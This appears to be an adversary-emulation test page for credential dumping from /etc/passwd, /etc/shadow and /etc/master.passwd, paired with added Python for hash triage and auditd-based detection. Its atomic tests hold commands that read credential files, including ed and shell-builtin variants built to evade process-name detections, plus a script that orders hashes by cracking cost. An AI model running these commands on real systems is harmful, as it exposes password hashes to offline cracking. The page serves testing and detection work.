# T1003.008 - /etc/passwd and /etc/shadow

Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems split user account information across the two files: /etc/passwd holds the world-readable account records (user name, uid, home directory, shell), while the password hashes live in /etc/shadow. By default, /etc/shadow is readable only by root (on many distributions also by members of the shadow group).(Citation: Linux Password and Shadow File Formats)

The unshadow utility, which ships with John the Ripper, combines the two files into the single-file format that password cracking utilities such as John the Ripper expect. It has to run as root (or as a user that can read /etc/shadow):(Citation: nixCraft - John the Ripper)

```bash
# /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db
```
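What unshadow produces, and how the result is triaged before cracking, as an added example (this is not code from the Atomic Red Team page or from John the Ripper). It merges passwd and shadow records by user name the way unshadow does, then classifies each password field by its crypt(3) scheme id and its locked or disabled state. The PASSWD and SHADOW strings are constructed sample data with placeholder hash bodies, and the COST ranking is a rough assumption about relative cracking cost at default work factors.

```python
"""Added example (not from the Atomic Red Team page or from John the Ripper):
merge passwd and shadow by user name the way unshadow does, then triage the
password fields.  PASSWD and SHADOW are constructed sample data; the hash
bodies are placeholders of the right shape, not real hashes."""

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/sh
legacy:x:1002:1002::/home/legacy:/bin/sh
svc:x:1003:1003::/var/lib/svc:/usr/sbin/nologin
"""

# shadow fields: name:hash:lastchg:min:max:warn:inactive:expire:reserved
SHADOW = """\
root:$6$c0nstructedsalt$PLACEHOLDERsha512cryptHASH:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$y$j9T$c0nstructedsalt$PLACEHOLDERyescryptHASH:19000:0:99999:7:::
bob:!$6$c0nstructedsalt$PLACEHOLDERlockedHASH:19000:0:99999:7:::
legacy:$1$c0nstr$PLACEHOLDERmd5cryptHASH:19000:0:99999:7:::
"""

# crypt(3) scheme ids as they appear at the start of the hash field.
HASH_IDS = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
            "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt",
            "$y$": "yescrypt", "$gy$": "gost-yescrypt"}
# Rough relative cracking cost, cheapest first (assumption: default work factors).
COST = {"descrypt": 0, "md5crypt": 1, "sha256crypt": 2, "sha512crypt": 3,
        "bcrypt": 4, "scrypt": 5, "yescrypt": 6, "gost-yescrypt": 6}
NOT_CRACKABLE = {"none", "empty", "unknown"}


def parse_colon_file(text):
    """Map user name -> list of fields, skipping blank and comment lines."""
    rows = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            rows[fields[0]] = fields
    return rows


def unshadow(passwd_text, shadow_text):
    """Return passwd lines with field 2 replaced by the shadow hash when the
    user has a shadow entry; users without one keep their passwd field."""
    shadow = parse_colon_file(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split(":")
        if f[0] in shadow:
            f[1] = shadow[f[0]][1]
        merged.append(":".join(f))
    return merged


def classify_hash(field):
    """Return (scheme, locked).  scheme is the crypt(3) scheme, 'none' when
    no hash is stored (x, *, !, !!), 'empty' for a blank field (login with no
    password), 'unknown' otherwise.  locked is True for the '!' prefix that
    passwd -l / usermod -L prepend: the hash behind it is still present and
    still crackable, so a locked account is not a safe account."""
    if field == "":
        return "empty", False
    locked = field.startswith("!")
    body = field.lstrip("!")
    if body in ("", "*", "x", "*NP*", "*LK*"):
        return "none", locked
    for prefix, scheme in HASH_IDS.items():
        if body.startswith(prefix):
            return scheme, locked
    if len(body) == 13 and "$" not in body:
        return "descrypt", locked
    return "unknown", locked


def triage(merged_lines):
    """One report row per merged line: user, uid, scheme, locked, crackable."""
    report = []
    for line in merged_lines:
        f = line.split(":")
        scheme, locked = classify_hash(f[1])
        report.append({"user": f[0], "uid": int(f[2]), "scheme": scheme,
                       "locked": locked, "crackable": scheme not in NOT_CRACKABLE})
    return report


def crack_order(report):
    """Crackable rows, cheapest scheme first, lowest uid first within a scheme."""
    return sorted((r for r in report if r["crackable"]),
                  key=lambda r: (COST.get(r["scheme"], 99), r["uid"]))


if __name__ == "__main__":
    merged = unshadow(PASSWD, SHADOW)
    print("\n".join(merged))  # what unshadow would hand to john
    for r in crack_order(triage(merged)):
        print(f"{r['user']:8} uid={r['uid']:<5} {r['scheme']}" + (" (locked)" if r["locked"] else ""))
```

Two points the triage makes visible: an account locked with passwd -l still carries its full hash behind the "!" prefix, so it goes straight into the cracking queue, and the cheapest scheme on the box (md5crypt here) is the attacker's first target regardless of which account it belongs to.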

## Atomic Tests

### Atomic Test #1 - Access /etc/shadow (Local)

/etc/shadow file is accessed in Linux environments.

Supported Platforms: linux

Elevation Required (e.g. root or admin)

#### Attack Commands: Run with bash

```bash
sudo cat /etc/shadow > /tmp/T1003.008.txt
cat /tmp/T1003.008.txt
```

Run it with Invoke-AtomicTest:

```powershell
Invoke-AtomicTest T1003.008 -TestNumbers 1
```

#### Cleanup:

```bash
rm -f /tmp/T1003.008.txt
```

```powershell
Invoke-AtomicTest T1003.008 -TestNumbers 1 -Cleanup
```

### Atomic Test #2 - Access /etc/master.passwd (Local)

/etc/master.passwd file is accessed in FreeBSD environments. On FreeBSD, /etc/master.passwd is the root-only file that holds the password hashes; the world-readable /etc/passwd there contains none.

Supported Platforms: linux (as listed on the page; the target file is the FreeBSD one)

Elevation Required (e.g. root or admin)

#### Attack Commands: Run with sh

```sh
sudo cat /etc/master.passwd > /tmp/T1003.008.txt
cat /tmp/T1003.008.txt
```

Run it with Invoke-AtomicTest:

```powershell
Invoke-AtomicTest T1003.008 -TestNumbers 2
```

#### Cleanup:

```sh
rm -f /tmp/T1003.008.txt
```

```powershell
Invoke-AtomicTest T1003.008 -TestNumbers 2 -Cleanup
```

### Atomic Test #3 - Access /etc/passwd (Local)

/etc/passwd file is accessed in FreeBSD and Linux environments. No elevation is needed because /etc/passwd is world-readable.

Supported Platforms: linux

#### Attack Commands: Run with sh

```sh
cat /etc/passwd > /tmp/T1003.008.txt
cat /tmp/T1003.008.txt
```

Run it with Invoke-AtomicTest:

```powershell
Invoke-AtomicTest T1003.008 -TestNumbers 3
```

#### Cleanup:

```sh
rm -f /tmp/T1003.008.txt
```

```powershell
Invoke-AtomicTest T1003.008 -TestNumbers 3 -Cleanup
```

### Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat

Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed. The point of the test is that a detection keyed on the process name "cat" does not fire: the reader is ed, a standard editor present on most systems.

Supported Platforms: linux

Elevation Required (e.g. root or admin)

#### Attack Commands: Run with sh

```sh
output_file=/tmp/T1003.008.txt  # default output path; matches the path removed by Cleanup
unamestr=$(uname)
# ed script: "e FILE" loads the file, ",p" prints every line of it. printf is used because "echo -e" is not portable under sh.
if [ "$unamestr" = 'Linux' ]; then printf 'e /etc/passwd\n,p\ne /etc/shadow\n,p\n' | ed > "$output_file"; elif [ "$unamestr" = 'FreeBSD' ]; then printf 'e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n' | ed > "$output_file"; fi
```

Run it with Invoke-AtomicTest:

```powershell
Invoke-AtomicTest T1003.008 -TestNumbers 4
```

#### Cleanup:

```sh
rm -f /tmp/T1003.008.txt
```

```powershell
Invoke-AtomicTest T1003.008 -TestNumbers 4 -Cleanup
```

### Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins

Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins. No external program is executed at all: the shell itself opens the file and copies it line by line with read and printf, so process-creation telemetry shows only the shell.

Supported Platforms: linux

Elevation Required (e.g. root or admin)

#### Attack Commands: Run with sh

```sh
# Copy a file using only shell builtins (read, printf); IFS= and -r keep whitespace and backslashes intact.
testcat(){ (while IFS= read -r line; do printf '%s\n' "$line" >> /tmp/T1003.008.txt; done < "$1") }
[ "$(uname)" = 'FreeBSD' ] && testcat /etc/master.passwd
testcat /etc/passwd
testcat /etc/shadow
```

Run it with Invoke-AtomicTest:

```powershell
Invoke-AtomicTest T1003.008 -TestNumbers 5
```

#### Cleanup:

```sh
rm -f /tmp/T1003.008.txt
```

```powershell
Invoke-AtomicTest T1003.008 -TestNumbers 5 -Cleanup
```

## Detection

auditd, which ships with many Linux distributions, can watch for processes opening /etc/passwd and /etc/shadow and record the pid, process name, executable and arguments of each access. Because tests 4 and 5 deliberately read the files with ed and with shell builtins rather than with cat, a detection should key on the file being opened (the PATH record of the audit event) rather than on the process name, and then compare the reading executable against the short list of programs expected to touch /etc/shadow on that host, such as the PAM helper unix_chkpwd. Failed opens by unprivileged users are worth alerting on as well, since they show the technique being attempted before privilege escalation.
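The detection logic run over sample auditd output, as an added example (not code from the original page). It assumes watch rules such as `-w /etc/shadow -p r -k cred_read` are loaded, groups the records of each audit event by their serial number, and alerts on every open of a credential file whose executable is not on an allowlist; because it keys on the PATH record rather than on the process name, the ed and shell-builtin variants from tests 4 and 5 are caught exactly like cat. The SAMPLE_AUDIT_LOG lines are constructed and abridged, and ALLOWED_READERS is an assumption to be tuned per host.

```python
"""Added example (not from the Atomic Red Team page): parse auditd records,
group them into events, and alert on opens of /etc/shadow, /etc/master.passwd
and /etc/passwd by executables outside an allowlist.  Assumes watch rules like
    -w /etc/shadow -p r -k cred_read
are loaded; SAMPLE_AUDIT_LOG is constructed and abridged, not real output."""
import re
from collections import defaultdict

SENSITIVE = {"/etc/shadow": "high", "/etc/master.passwd": "high", "/etc/passwd": "low"}
# Programs expected to open these files legitimately (assumption; tune per host).
ALLOWED_READERS = {"/usr/sbin/unix_chkpwd", "/usr/bin/passwd", "/usr/bin/sudo",
                   "/usr/bin/login", "/usr/sbin/sshd"}

KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
MSG_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")


def decode_proctitle(raw):
    """auditd prints proctitle quoted when it is plain text and hex-encoded
    (NUL-separated argv) otherwise; return the command line either way."""
    if raw.startswith('"'):
        return raw.strip('"')
    try:
        return bytes.fromhex(raw).decode("utf-8", "replace").replace("\x00", " ")
    except ValueError:
        return raw


def parse_record(line):
    """One audit record -> dict of its key=value fields plus the event serial."""
    rec = {}
    for key, val in KV_RE.findall(line):
        rec[key] = decode_proctitle(val) if key == "proctitle" else val.strip('"')
    m = MSG_RE.search(line)
    if m:
        rec["timestamp"], rec["event_id"] = m.group(1), int(m.group(2))
    return rec


def group_events(audit_text):
    """Records sharing an audit serial belong to one syscall event."""
    events = defaultdict(list)
    for line in audit_text.splitlines():
        rec = parse_record(line.strip())
        if "event_id" in rec:
            events[rec["event_id"]].append(rec)
    return events


def find_credential_reads(audit_text, allowed=ALLOWED_READERS):
    """Alert on every event whose PATH record names a credential file, unless
    the SYSCALL record's exe is allowlisted.  Failed attempts (success=no,
    e.g. an unprivileged user hitting EACCES) are reported too."""
    alerts = []
    for event_id, recs in sorted(group_events(audit_text).items()):
        syscall = next((r for r in recs if r.get("type") == "SYSCALL"), None)
        if syscall is None or syscall.get("exe") in allowed:
            continue
        paths = [r["name"] for r in recs if r.get("type") == "PATH" and r.get("name") in SENSITIVE]
        cmdline = next((r["proctitle"] for r in recs if r.get("type") == "PROCTITLE"), "")
        for path in paths:
            alerts.append({
                "event_id": event_id, "path": path, "severity": SENSITIVE[path],
                "exe": syscall.get("exe"), "comm": syscall.get("comm"),
                "pid": syscall.get("pid"), "auid": syscall.get("auid"),
                "uid": syscall.get("uid"), "success": syscall.get("success"),
                "cmdline": cmdline,
            })
    return alerts


# Constructed, abridged records for the tests above: cat, ed and a shell
# builtin reading /etc/shadow as root, unix_chkpwd (legitimate), and an
# unprivileged cat that fails with EACCES (exit=-13).
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000000.101:2001): arch=c000003e syscall=257 success=yes exit=3 ppid=4100 pid=4101 auid=1000 uid=0 comm="cat" exe="/usr/bin/cat" key="cred_read"
type=PATH msg=audit(1700000000.101:2001): item=0 name="/etc/shadow" mode=0100640 ouid=0 ogid=42 nametype=NORMAL
type=PROCTITLE msg=audit(1700000000.101:2001): proctitle=636174002F6574632F736861646F77
type=SYSCALL msg=audit(1700000000.205:2002): arch=c000003e syscall=257 success=yes exit=3 ppid=4100 pid=4110 auid=1000 uid=0 comm="ed" exe="/usr/bin/ed" key="cred_read"
type=PATH msg=audit(1700000000.205:2002): item=0 name="/etc/shadow" mode=0100640 ouid=0 ogid=42 nametype=NORMAL
type=PROCTITLE msg=audit(1700000000.205:2002): proctitle="ed"
type=SYSCALL msg=audit(1700000000.310:2003): arch=c000003e syscall=257 success=yes exit=3 ppid=4100 pid=4120 auid=1000 uid=0 comm="sh" exe="/usr/bin/dash" key="cred_read"
type=PATH msg=audit(1700000000.310:2003): item=0 name="/etc/shadow" mode=0100640 ouid=0 ogid=42 nametype=NORMAL
type=PROCTITLE msg=audit(1700000000.310:2003): proctitle="sh"
type=SYSCALL msg=audit(1700000000.420:2004): arch=c000003e syscall=257 success=yes exit=3 ppid=900 pid=4130 auid=4294967295 uid=0 comm="unix_chkpwd" exe="/usr/sbin/unix_chkpwd" key="cred_read"
type=PATH msg=audit(1700000000.420:2004): item=0 name="/etc/shadow" mode=0100640 ouid=0 ogid=42 nametype=NORMAL
type=PROCTITLE msg=audit(1700000000.420:2004): proctitle="unix_chkpwd"
type=SYSCALL msg=audit(1700000000.530:2005): arch=c000003e syscall=257 success=no exit=-13 ppid=4100 pid=4140 auid=1001 uid=1001 comm="cat" exe="/usr/bin/cat" key="cred_read"
type=PATH msg=audit(1700000000.530:2005): item=0 name="/etc/shadow" mode=0100640 ouid=0 ogid=42 nametype=NORMAL
type=PROCTITLE msg=audit(1700000000.530:2005): proctitle=636174002F6574632F736861646F77
"""

if __name__ == "__main__":
    for a in find_credential_reads(SAMPLE_AUDIT_LOG):
        print(f"[{a['severity']}] event {a['event_id']}: {a['exe']} (pid {a['pid']}, auid {a['auid']}, "
              f"uid {a['uid']}) opened {a['path']} success={a['success']} cmd={a['cmdline']!r}")
```

Keying on the PATH record is what makes this robust to tests 4 and 5: the ed and dash events carry no "cat" anywhere, but they open the same inode and so produce the same PATH record. The auid field (the login uid, unchanged across sudo) is the value to pivot on when attributing a root-level read back to the human who performed it.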